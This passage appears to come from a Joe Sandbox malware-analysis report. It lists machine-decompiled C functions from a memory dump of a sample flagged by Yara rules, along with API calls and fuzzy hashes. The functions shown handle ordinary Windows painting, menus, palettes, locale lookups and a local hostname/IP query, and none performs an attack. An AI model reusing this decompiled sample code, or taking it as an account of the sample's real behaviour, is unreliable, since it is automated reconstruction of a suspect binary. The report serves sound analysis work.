					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043F510(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43f4df);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00441704(_v8),  &_v84);
				}
				return _t55;
			}


















                                                    0x0043f3b9
                                                    0x0043f3bb
                                                    0x0043f3c1
                                                    0x0043f3c4
                                                    0x0043f3ca
                                                    0x0043f3cf
                                                    0x0043f3e3
                                                    0x0043f3e3
                                                    0x0043f3e7
                                                    0x0043f3e8
                                                    0x0043f3ed
                                                    0x0043f3f0
                                                    0x0043f3fd
                                                    0x0043f417
                                                    0x0043f41a
                                                    0x0043f42d
                                                    0x0043f430
                                                    0x0043f432
                                                    0x0043f433
                                                    0x0043f435
                                                    0x0043f440
                                                    0x0043f449
                                                    0x0043f45b
                                                    0x00000000
                                                    0x0043f45d
                                                    0x0043f479
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f482
                                                    0x0043f482
                                                    0x0043f483
                                                    0x0043f483
                                                    0x0043f435
                                                    0x0043f486
                                                    0x0043f48a
                                                    0x0043f493
                                                    0x0043f493
                                                    0x0043f49e
                                                    0x0043f3ff
                                                    0x0043f406
                                                    0x0043f406
                                                    0x0043f4aa
                                                    0x0043f4b1
                                                    0x0043f4b4
                                                    0x0043f4b7
                                                    0x0043f4bc
                                                    0x0043f4c3
                                                    0x00000000
                                                    0x0043f4d2
                                                    0x0043f4d7

                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                    • SaveDC.GDI32(?), ref: 0043F412
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                    • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                    • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                    • String ID:
                                                    • API String ID: 3808407030-0
                                                    • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                    • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AD40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044AD40(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044AD40(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044AE70(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E0044AE70(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044AE70(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
							L14:
							E0044AC00(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x3c))();
						}
						_t44 =  *0x449854; // 0x4498a0
						if(L00403D78( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0x34));
							 *(_t49 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}












                                                    0x0044ad40
                                                    0x0044ad44
                                                    0x0044ad4a
                                                    0x0044ad54
                                                    0x0044ad56
                                                    0x00000000
                                                    0x0044ad56
                                                    0x0044ad5f
                                                    0x0044ad64
                                                    0x00000000
                                                    0x0044ad66
                                                    0x0044ad78
                                                    0x0044ad7d
                                                    0x0044ad81
                                                    0x0044ad86
                                                    0x0044ad8f
                                                    0x0044ad99
                                                    0x0044ada0
                                                    0x0044adb0
                                                    0x0044adb5
                                                    0x0044adb5
                                                    0x0044adb7
                                                    0x0044adb8
                                                    0x0044adbe
                                                    0x0044adc4
                                                    0x0044adf9
                                                    0x0044adfb
                                                    0x0044ae00
                                                    0x00000000
                                                    0x0044ae06
                                                    0x0044adc9
                                                    0x0044add6
                                                    0x00000000
                                                    0x0044ade9
                                                    0x0044aded
                                                    0x0044adf4
                                                    0x00000000
                                                    0x0044adf4
                                                    0x0044add6
                                                    0x0044adbe
                                                    0x0044ae0d

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                    • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(L00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                    0x0045a390
                                                    0x0045a394
                                                    0x0045a396
                                                    0x0045a398
                                                    0x0045a39a
                                                    0x0045a3a2
                                                    0x0045a441
                                                    0x0045a447
                                                    0x0045a3b3
                                                    0x0045a3b8
                                                    0x0045a3bc
                                                    0x0045a422
                                                    0x0045a43f
                                                    0x0045a43f
                                                    0x00000000
                                                    0x0045a422
                                                    0x0045a3be
                                                    0x0045a3c0
                                                    0x0045a3c0
                                                    0x0045a3c5
                                                    0x0045a3e0
                                                    0x0045a3e9
                                                    0x0045a3de
                                                    0x00000000
                                                    0x0045a3de
                                                    0x0045a3f1
                                                    0x0045a3f3
                                                    0x0045a3f3
                                                    0x00000000
                                                    0x0045a3cf
                                                    0x0045a3d4
                                                    0x0045a3f5
                                                    0x0045a40e
                                                    0x0045a410
                                                    0x0045a410
                                                    0x00000000
                                                    0x0045a40e
                                                    0x0045a3c5

                                                    APIs
                                                    • GetCapture.USER32 ref: 0045A3B3
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                    • GetWindowLongA.USER32 ref: 0045A417
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend$CaptureLongWindow
                                                    • String ID:
                                                    • API String ID: 1158686931-0
                                                    • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                    • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442F0C Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 22%
                                                    			E00442F0C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x49d970; // 0x49e900
					_t17 =  *0x49d970; // 0x49e900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042C408();
					_v8 = _t19;
					_push(_t49);
					_push(0x442fcc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042C48C();
					_push( &_v16);
					_push(0);
					L0042C49C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042C48C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x442fd3);
					_t37 = _v8;
					_push(_t37);
					L0042C410();
					return _t37;
				}
			}

















                                                    0x00442f0d
                                                    0x00442f0f
                                                    0x00442f13
                                                    0x00442f1a
                                                    0x00442fd7
                                                    0x00442f20
                                                    0x00442f28
                                                    0x00442f34
                                                    0x00442f3b
                                                    0x00442f3d
                                                    0x00442f3e
                                                    0x00442f43
                                                    0x00442f48
                                                    0x00442f49
                                                    0x00442f4e
                                                    0x00442f51
                                                    0x00442f58
                                                    0x00442f69
                                                    0x00442f72
                                                    0x00442f83
                                                    0x00442f88
                                                    0x00442f8a
                                                    0x00442f8c
                                                    0x00442f91
                                                    0x00442f92
                                                    0x00442f9a
                                                    0x00442f9b
                                                    0x00442f9d
                                                    0x00442fa5
                                                    0x00442fa9
                                                    0x00442faa
                                                    0x00442faf
                                                    0x00442fb0
                                                    0x00442fb7
                                                    0x00442fba
                                                    0x00442fbd
                                                    0x00442fc2
                                                    0x00442fc5
                                                    0x00442fc6
                                                    0x00442fcb
                                                    0x00442fcb

                                                    APIs
                                                    • 739F1AB0.COMCTL32(00000000), ref: 00442F3E
                                                      • Part of subcall function 0042C440: 739F2140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                    • 739F1680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                    • 739F1710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                    • 739F1680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                    • 739F1F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F1680$F1710F2140
                                                    • String ID:
                                                    • API String ID: 3528053765-0
                                                    • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                    • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00472C58 Relevance: 7.6, APIs: 5, Instructions: 67networkCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v408;
				char _v412;
				char _v416;
				int _t30;
				char* _t38;
				signed int _t39;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr _t55;
				void* _t56;
				void* _t58;

				_v416 = 0;
				_v412 = 0;
				 *[fs:eax] = _t58 + 0xfffffe64;
				_t38 = E00408D24(0x104, __eflags);
				L00472BD0();
				_v8 = L00403BBC(1);
				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
				E00404BB8( &_v412, _t38);
				_t30 = gethostname(_t38, E00404C80(_v412));
				_push(_t38);
				L00472BC0();
				if(_t30 != 0) {
					_t55 =  *((intOrPtr*)(_t30 + 0xc));
					_t39 = 0;
					while(1) {
						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
						if(_t53 == 0) {
							break;
						}
						L00472BB8();
						E00404BB8( &_v416, _t30);
						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
						_t39 = _t39 + 1;
						__eflags = _t39;
					}
					L00472BD8();
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x472d38);
				return E004049E4( &_v416, 2);
			}















                                                    0x00472c66
                                                    0x00472c6c
                                                    0x00472c7d
                                                    0x00472c8a
                                                    0x00472c98
                                                    0x00472ca9
                                                    0x00472cb1
                                                    0x00472cbc
                                                    0x00472cce
                                                    0x00472cd3
                                                    0x00472cd4
                                                    0x00472cdb
                                                    0x00472cdd
                                                    0x00472ce0
                                                    0x00472d07
                                                    0x00472d07
                                                    0x00472d0c
                                                    0x00000000
                                                    0x00000000
                                                    0x00472ce6
                                                    0x00472cf3
                                                    0x00472d03
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d0e
                                                    0x00472d0e
                                                    0x00472d15
                                                    0x00472d18
                                                    0x00472d1b
                                                    0x00472d30

                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                    • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                    • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                    • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                    • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 348263315-0
                                                    • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                    • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A288 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0042A288(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E00428BFC(_t22);
					}
					_t21 = E00426750( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E00426060(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                    0x0042a288
                                                    0x0042a28c
                                                    0x0042a28e
                                                    0x0042a295
                                                    0x0042a2af
                                                    0x0042a2b5
                                                    0x0042a2b7
                                                    0x0042a2b7
                                                    0x0042a2ce
                                                    0x0042a2d3
                                                    0x0042a2d5
                                                    0x0042a2da
                                                    0x0042a2e8
                                                    0x0042a2ee
                                                    0x0042a317
                                                    0x0042a317
                                                    0x0042a2f0
                                                    0x0042a2f3
                                                    0x0042a311
                                                    0x00000000
                                                    0x0042a313
                                                    0x0042a313
                                                    0x0042a313
                                                    0x0042a311
                                                    0x0042a319
                                                    0x0042a31e
                                                    0x0042a326
                                                    0x0042a326
                                                    0x0042a32c
                                                    0x0042a335
                                                    0x0042a337
                                                    0x00000000
                                                    0x0042a337
                                                    0x0042a335
                                                    0x0042a2da
                                                    0x0042a33f

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042A2DE
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A2F3
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A2FD
                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                    • ReleaseDC.USER32 ref: 0042A32C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                    • String ID:
                                                    • API String ID: 2404249990-0
                                                    • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                    • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004266B8 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E004266B8(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x49e894 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x42673e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x49e894; // 0x5e0807a3
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x49e894; // 0x5e0807a3
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x426745);
					return ReleaseDC(0, _v12);
				}
			}












                                                    0x004266b9
                                                    0x004266bb
                                                    0x004266bf
                                                    0x004266c1
                                                    0x004266cc
                                                    0x0042674c
                                                    0x004266ce
                                                    0x004266d5
                                                    0x004266da
                                                    0x004266db
                                                    0x004266e0
                                                    0x004266e3
                                                    0x004266f4
                                                    0x004266fe
                                                    0x00426704
                                                    0x00426716
                                                    0x0042671c
                                                    0x00426721
                                                    0x00426721
                                                    0x00426727
                                                    0x0042672a
                                                    0x0042672d
                                                    0x0042673d
                                                    0x0042673d

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004266D0
                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 004266EC
                                                    • GetPaletteEntries.GDI32(5E0807A3,00000000,00000008,?), ref: 00426704
                                                    • GetPaletteEntries.GDI32(5E0807A3,00000008,00000008,?), ref: 0042671C
                                                    • ReleaseDC.USER32 ref: 00426738
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EntriesPalette$CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 3128150645-0
                                                    • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                    • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










                                                    0x0040cbec
                                                    0x0040cbef
                                                    0x0040cbf4
                                                    0x0040cbf5
                                                    0x0040cbfa
                                                    0x0040cbfd
                                                    0x0040cc13
                                                    0x0040cc25
                                                    0x0040cc2f
                                                    0x0040cc3f
                                                    0x0040cc44
                                                    0x0040cc49
                                                    0x0040cc4e
                                                    0x0040cc4e
                                                    0x0040cc54
                                                    0x0040cc57
                                                    0x0040cc57
                                                    0x0040cc68
                                                    0x0040cc68
                                                    0x0040cc6f
                                                    0x0040cc72
                                                    0x0040cc75
                                                    0x0040cc82

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                    • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
